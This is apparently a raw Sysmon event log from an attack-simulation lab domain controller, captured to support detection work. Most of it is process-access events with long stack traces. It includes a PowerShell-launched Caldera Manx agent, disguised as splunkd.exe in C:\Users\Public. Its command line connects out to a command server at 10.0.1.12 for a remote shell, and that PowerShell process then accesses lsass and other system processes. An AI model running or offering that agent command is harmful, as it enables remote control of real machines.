15:51:10.253{D28789B6-7C62-5FA1-0A00-000000008801}852936C:\Windows\system32\services.exe{D28789B6-7C6E-5FA1-2900-000000008801}2040C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001154Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:10.253{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7C6E-5FA1-2900-000000008801}2040C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001153Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:10.253{D28789B6-7C62-5FA1-0A00-000000008801}852952C:\Windows\system32\services.exe{D28789B6-7C6E-5FA1-2900-000000008801}2040C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+52f1|C:\Windows\system32\services.exe+d7ae|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001152Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:10.261{D28789B6-7C6E-5FA1-2900-000000008801}2040C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\System32\svchost.exe -k smbsvcsC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001151Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:10.253{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001150Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:10.253{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001149Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:10.253{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001148Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:10.253{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001147Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:09.378{D28789B6-7C64-5FA1-1300-000000008801}12241976C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|c:\windows\system32\es.dll+14045|c:\windows\system32\es.dll+200bc|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fa39|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+6114b|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+5219e|C:\Windows\System32\RPCRT4.dll+25357|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001146Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:09.378{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001145Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:07.253{D28789B6-7C6B-5FA1-2800-000000008801}24402636C:\Windows\system32\conhost.exe{D28789B6-7C6B-5FA1-2700-000000008801}2324C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001144Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:07.253{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7C6B-5FA1-2800-000000008801}2440C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001143Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:07.238{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7C6B-5FA1-2700-000000008801}2324C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001142Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:07.238{D28789B6-7C64-5FA1-1800-000000008801}21402860Shell.Commands.ManagWindowsPowerShell\v1.0\powershell.exe{D28789B6-7C6B-5FA1-2700-000000008801}2324C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+13755f|C:\Windows\System32\windows.storage.dll+1371d5|C:\Windows\System32\windows.storage.dll+136cc6|C:\Windows\System32\windows.storage.dll+138138|C:\Windows\System32\windows.storage.dll+136aee|C:\Windows\System32\windows.storage.dll+10a3b5|C:\Windows\System32\windows.storage.dll+10a734|C:\Windows\System32\windows.storage.dll+109d70|C:\Windows\System32\shell32.dll+e8b0f|C:\Windows\System32\shell32.dll+e899c|C:\Windows\System32\shell32.dll+e86ec|C:\Windows\System32\shell32.dll+31537|C:\Windows\System32\shell32.dll+31495|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+33903a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+276811|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+acd828|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+271e5f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b56bc|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64) 154100x80000000000000001141Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:07.188{D28789B6-7C6B-5FA1-2700-000000008801}2324C:\Users\Public\splunkd.exe-----"C:\Users\Public\splunkd.exe" -socket 10.0.1.12:7010 -http http://10.0.1.12:8888 -contact tcp C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=32E2535A13E90442893737530C4773D1,SHA256=C4A32E14644C0859C895A66C96AECC9647949F8295EADE40ACE7F3EFC597C6F9,IMPHASH=1CD364A9E949D5ECEBD6C614E64BC545{D28789B6-7C64-5FA1-1800-000000008801}2140C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Unrestricted -NonInteractive -File C:\caldera_manx_agent.ps1 11241100x80000000000000001140Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localEXE2020-11-03 15:51:06.738{D28789B6-7C64-5FA1-1800-000000008801}2140C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Public\splunkd.exe2020-11-03 15:50:05.639 10341000x80000000000000001139Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.597{D28789B6-7C64-5FA1-1800-000000008801}21402860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8DDCB3F41) 10341000x80000000000000001138Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.597{D28789B6-7C64-5FA1-1800-000000008801}21402860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7C62-5FA1-0900-000000008801}780C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8DDCB3F41) 10341000x80000000000000001137Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.597{D28789B6-7C64-5FA1-1800-000000008801}21402860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7C6A-5FA1-2500-000000008801}3024C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8DDCB3F41) 10341000x80000000000000001136Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.597{D28789B6-7C64-5FA1-1800-000000008801}21402860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7C6A-5FA1-2600-000000008801}3064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8DDCB3F41) 10341000x80000000000000001135Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.597{D28789B6-7C64-5FA1-1800-000000008801}21402860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7C65-5FA1-2200-000000008801}2380C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8DDCB3F41) 10341000x80000000000000001134Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.597{D28789B6-7C64-5FA1-1800-000000008801}21402860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7C64-5FA1-1700-000000008801}1728C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8DDCB3F41) 10341000x80000000000000001133Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.597{D28789B6-7C64-5FA1-1800-000000008801}21402860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7C64-5FA1-1600-000000008801}1544C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8DDCB3F41) 10341000x80000000000000001132Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.597{D28789B6-7C64-5FA1-1800-000000008801}21402860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8DDCB3F41) 10341000x80000000000000001131Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.597{D28789B6-7C64-5FA1-1800-000000008801}21402860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7C64-5FA1-1400-000000008801}1312C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8DDCB3F41) 10341000x80000000000000001130Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.597{D28789B6-7C64-5FA1-1800-000000008801}21402860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7C64-5FA1-1300-000000008801}1224C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8DDCB3F41) 10341000x80000000000000001129Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.597{D28789B6-7C64-5FA1-1800-000000008801}21402860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7C64-5FA1-1200-000000008801}1216C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8DDCB3F41) 10341000x80000000000000001128Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.597{D28789B6-7C64-5FA1-1800-000000008801}21402860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8DDCB3F41) 10341000x80000000000000001127Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 